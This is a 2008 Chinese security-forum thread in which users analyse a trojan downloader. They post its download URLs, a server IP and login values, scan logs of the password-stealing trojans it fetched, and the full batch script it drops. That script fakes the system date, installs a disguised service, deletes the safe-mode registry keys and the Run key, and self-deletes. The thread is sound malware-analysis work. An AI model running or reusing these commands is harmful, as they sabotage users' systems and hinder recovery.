奇怪的下载者，高手来看看

zzh161

报这个下载者的就不多，发现它连出去的地方更奇特

下载者：

http://www.lmok123.com/hostsip2008.txt?sid=151521
http://lmok1234xing.w239.dns911.cn/hostsip2008.txt?sid=151521
http://www.cash888.net/hostsip2008.txt?sid=151521
http://www.cash888.net/hostsip2008.txt?sid=151552
http://lmok1234xing.w239.dns911.cn/hostsip2008.txt?sid=151552
http://www.lmok123.com/hostsip2008.txt?sid=151552
http://lmok1234xing.w239.dns911.cn/hostsip2008.txt?sid=151622
http://www.lmok123.com/hostsip2008.txt?sid=151622
http://www.cash888.net/hostsip2008.txt?sid=151622

所有的TXT下来都是同一个

ht_ok
5150
58.49.58.20
8080

用ftp访问58.49.58.20：8080没用，用http访问http://58.49.58.20是个后台，用上面的用户名密码登录没用，
看源码有这么一段

<SCRIPT language=JavaScript>
function TopRegFormCheck() {
  if(document.TopRegForm.card.value.length<6) {
   alert("用户不能为空或长度不对")
   document.TopRegForm.card.focus();
   return false;
  }  
  if(document.TopRegForm.pass.value.length<6) {
   alert("密码不能为空或长度不对")
   document.TopRegForm.pass.focus();
   return false;
  }
  return true;
}

function SiteUserReg(){
  alert("请发信给我们,写明您的帐号和域名,我们核对无误后,才会给您回复")
}
</SCRIPT>

没辙了，不知道这个下载者想下什么

[ 本帖最后由 zzh161 于 2008-2-1 16:35 编辑 ]

冷冷

IKARUS / ClamAV 吃白果
--------------------------------

150231887.bat 内容
date 2004-08-17
time 19:59:58.00
ping 127.0.0.1 -n 5
sc.exe create ras32lenovo BinPath= "D:\WINDOWS\system32\ras32lenovo.exe" type= own type= interact start= auto DisplayName= ras32lenovo
sc.exe description ras32lenovo 向逻辑磁盘管理器管理服务发送卷的信息以便配置。如果此服务被终止，动态磁盘状态和配置信息会过时。如果此服务被禁用，任何依赖它的服务将无法启动
regsvr32.exe /u /s scrrun.dll
regsvr32.exe /u /s shimgvw.dll
regsvr32.exe /u /s itss.dll
regsvr32.exe /u /s vbscript.dll
regsvr32.exe /s jscript.dll
reg.exe delete HKLM\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318} /F
reg.exe delete HKLM\SYSTEM\ControlSet001\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318} /F
reg.exe delete HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318} /F
reg.exe delete HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318} /F
reg.exe delete HKLM\Software\Microsoft\Windows\CurrentVersion\Run /F
sc.exe start ras32lenovo
regsvr32.exe /s D:\WINDOWS\system32\windowsWatch.dll
regsvr32.exe /s D:\WINDOWS\system32\windowsWatch.dll
del "C:\WINDOWS\Media\Windows XP 开始.wav"
del "C:\WINDOWS\Media\Windows XP 信息栏.wav"
del "C:\WINDOWS\Media\Windows XP 弹出窗口已阻止.wav"
ping 127.0.0.1 -n 6
del "I:\virus\test\2.EXE" /F
date 2008-02-01
time 16:38:29
del %0
exit




还有更多的联网动作，不一一列举。。

[ 本帖最后由 冷_冷 于 2008-2-1 16:55 编辑 ]

gho

FS MISS，MDF检测到联网动作

啊弥陀佛

微点砍掉

llgiggs

紅傘無視

zzh161

问题是它到底下载到什么了

冷冷

很多东西  用皇帝扫过 没毒

不过在跑了 很多毒

[ 本帖最后由 冷_冷 于 2008-2-1 17:17 编辑 ]

冷冷

这次很多东西耶

大蜘蛛的
Wn_Sys8x.Sys;I:\VS\VIRUS\drive\D\Program Files\Internet Explorer\PLUGINS;Trojan.PWS.Lineage.origin;;
cmdbcs.exe;I:\VS\VIRUS\drive\D\WINDOWS;Trojan.PWS.Wsgame.origin;;
dtbqespn.exe;I:\VS\VIRUS\drive\D\WINDOWS;可能 BACKDOOR.Trojan;;
jpgmtulkv.exe;I:\VS\VIRUS\drive\D\WINDOWS;可能 BACKDOOR.Trojan;;
Kvsc3.exE;I:\VS\VIRUS\drive\D\WINDOWS;Trojan.PWS.Wsgame.2787;;
qveslvef.exe;I:\VS\VIRUS\drive\D\WINDOWS;可能 BACKDOOR.Trojan;;
WinForm.exE;I:\VS\VIRUS\drive\D\WINDOWS;Trojan.PWS.Wsgame.3090;;
auhad.dll\data001;I:\VS\VIRUS\drive\D\WINDOWS\system32\auhad.dll;Trojan.PWS.Wsgame.3190;;
auhad.dll\data002;I:\VS\VIRUS\drive\D\WINDOWS\system32\auhad.dll;Trojan.PWS.Wsgame.3189;;
auhad.dll;I:\VS\VIRUS\drive\D\WINDOWS\system32;发现档案文件中有受感染的对象;;
cmdbcs.dll;I:\VS\VIRUS\drive\D\WINDOWS\system32;可能 DLOADER.Trojan;;
gnaixnauhqq.dll;I:\VS\VIRUS\drive\D\WINDOWS\system32;Trojan.PWS.Wsgame.3118;;
gnolnait.dll\data001;I:\VS\VIRUS\drive\D\WINDOWS\system32\gnolnait.dll;Trojan.PWS.Wsgame.3233;;
gnolnait.dll\data002;I:\VS\VIRUS\drive\D\WINDOWS\system32\gnolnait.dll;Trojan.PWS.Wsgame.3235;;
gnolnait.dll;I:\VS\VIRUS\drive\D\WINDOWS\system32;发现档案文件中有受感染的对象;;
HHHCompress.dll;I:\VS\VIRUS\drive\D\WINDOWS\system32;Trojan.PWS.Gamania.7288;;
iqnauhc.dll\data001;I:\VS\VIRUS\drive\D\WINDOWS\system32\iqnauhc.dll;Trojan.PWS.Wsgame.3190;;
iqnauhc.dll\data002;I:\VS\VIRUS\drive\D\WINDOWS\system32\iqnauhc.dll;Trojan.PWS.Wsgame.3189;;
iqnauhc.dll;I:\VS\VIRUS\drive\D\WINDOWS\system32;发现档案文件中有受感染的对象;;
Kvsc3.dll;I:\VS\VIRUS\drive\D\WINDOWS\system32;可能 DLOADER.Trojan;;
naixuhz.dll;I:\VS\VIRUS\drive\D\WINDOWS\system32;Trojan.PWS.Wsgame.3193;;
utgnehz.dll\data001;I:\VS\VIRUS\drive\D\WINDOWS\system32\utgnehz.dll;Trojan.PWS.Wsgame.3185;;
utgnehz.dll\data002;I:\VS\VIRUS\drive\D\WINDOWS\system32\utgnehz.dll;Trojan.PWS.Wsgame.3164;;
utgnehz.dll;I:\VS\VIRUS\drive\D\WINDOWS\system32;发现档案文件中有受感染的对象;;
WinForm.dll;I:\VS\VIRUS\drive\D\WINDOWS\system32;Trojan.PWS.Wsgame.3089;;
yjscmucwow.dll;I:\VS\VIRUS\drive\D\WINDOWS\system32;Trojan.PWS.Gamania.7288;;
pop.sys;I:\VS\VIRUS\drive\D\WINDOWS\system32\DRIVERS;Trojan.NtRootKit.740;;
tmp108.tmp;I:\VS\VIRUS\drive\I\Temp;Trojan.DownLoader.45214;;
tmp109.tmp;I:\VS\VIRUS\drive\I\Temp;Trojan.DownLoader.45214;;
tmp10B.tmp;I:\VS\VIRUS\drive\I\Temp;Trojan.PWS.Wsgame.3090;;
tmp10C.tmp;I:\VS\VIRUS\drive\I\Temp;可能 BACKDOOR.Trojan;;
tmp10D.tmp;I:\VS\VIRUS\drive\I\Temp;可能 BACKDOOR.Trojan;;
tmp113.tmp;I:\VS\VIRUS\drive\I\Temp;Trojan.PWS.Wsgame.3233;;
tmp114.tmp;I:\VS\VIRUS\drive\I\Temp;Trojan.PWS.Wsgame.3196;;
tmp117.tmp;I:\VS\VIRUS\drive\I\Temp;Trojan.PWS.Wsgame.3185;;
tmp118.tmp;I:\VS\VIRUS\drive\I\Temp;Trojan.PWS.Wsgame.3196;;
tmp11B.tmp;I:\VS\VIRUS\drive\I\Temp;Trojan.PWS.Wsgame.3190;;
tmp11C.tmp;I:\VS\VIRUS\drive\I\Temp;Trojan.PWS.Lineage.origin;;
tmp11F.tmp;I:\VS\VIRUS\drive\I\Temp;Trojan.PWS.Wsgame.3190;;
tmp121.tmp;I:\VS\VIRUS\drive\I\Temp;Trojan.PWS.Wsgame.3196;;
tmp122.tmp;I:\VS\VIRUS\drive\I\Temp;Trojan.PWS.Wsgame.origin;;
tmp125.tmp;I:\VS\VIRUS\drive\I\Temp;Trojan.PWS.Wsgame.3190;;
tmp126.tmp;I:\VS\VIRUS\drive\I\Temp;Trojan.PWS.Wsgame.2787;;
tmp127.tmp;I:\VS\VIRUS\drive\I\Temp;Trojan.PWS.Wsgame.3104;;
tmp12A.tmp;I:\VS\VIRUS\drive\I\Temp;Trojan.PWS.Wsgame.3106;;
11[1].exe;I:\VS\VIRUS\drive\I\Temporary Internet Files\Content.IE5\MXVNN9I7;Trojan.PWS.Wsgame.origin;;
1[1].exe;I:\VS\VIRUS\drive\I\Temporary Internet Files\Content.IE5\MXVNN9I7;Trojan.PWS.Wsgame.3090;;
3[1].exe;I:\VS\VIRUS\drive\I\Temporary Internet Files\Content.IE5\MXVNN9I7;可能 BACKDOOR.Trojan;;
014[1].exe;I:\VS\VIRUS\drive\I\Temporary Internet Files\Content.IE5\TNBHFTJC;Trojan.DownLoader.43172;;
12[1].exe;I:\VS\VIRUS\drive\I\Temporary Internet Files\Content.IE5\TNBHFTJC;Trojan.PWS.Wsgame.2787;;
4[1].exe;I:\VS\VIRUS\drive\I\Temporary Internet Files\Content.IE5\TNBHFTJC;Trojan.PWS.Gamania.7288;;
dod[1].exe;I:\VS\VIRUS\drive\I\Temporary Internet Files\Content.IE5\TNBHFTJC;可能 MULDROP.Trojan;;
8[1].exe;I:\VS\VIRUS\drive\I\Temporary Internet Files\Content.IE5\X3R4EWD7;Trojan.PWS.Wsgame.3196;;
10[1].exe;I:\VS\VIRUS\drive\I\Temporary Internet Files\Content.IE5\ZINY37IC;Trojan.PWS.Wsgame.3196;;
13[1].exe;I:\VS\VIRUS\drive\I\Temporary Internet Files\Content.IE5\ZINY37IC;Trojan.PWS.Wsgame.3104;;
14[1].exe;I:\VS\VIRUS\drive\I\Temporary Internet Files\Content.IE5\ZINY37IC;Trojan.DownLoader.43172;;
2[1].exe;I:\VS\VIRUS\drive\I\Temporary Internet Files\Content.IE5\ZINY37IC;可能 BACKDOOR.Trojan;;
7[1].exe;I:\VS\VIRUS\drive\I\Temporary Internet Files\Content.IE5\ZINY37IC;Trojan.PWS.Wsgame.3196;;
9[1].exe;I:\VS\VIRUS\drive\I\Temporary Internet Files\Content.IE5\ZINY37IC;Trojan.PWS.Lineage.origin;;
down[1].exe;I:\VS\VIRUS\drive\I\Temporary Internet Files\Content.IE5\ZINY37IC;Trojan.DownLoader.45214;;
ntuser.com;I:\VS\VIRUS\drive\I\virus;Trojan.DownLoader.43172;;
cike.com;I:\VS\VIRUS\drive\I\virus\test;Trojan.DownLoader.45214;;




基本都在这啦

[ 本帖最后由 冷_冷 于 2008-2-1 17:16 编辑 ]

Graybird

The file '2.EXE' has been determined to be 'MALWARE'. Our analysts named the threat TR/Drop.Agent.61440. The term "TR/" denotes a trojan horse that is able to spy out data, to violate your privacy or carry out unwanted modifications to the system.Detection will be added to our virus definition file (VDF) with one of the next updates.

醉一生爱妍

费尔MISS 动态报低级危险 (改系统时间这么高级危险还报低级。。。）上报了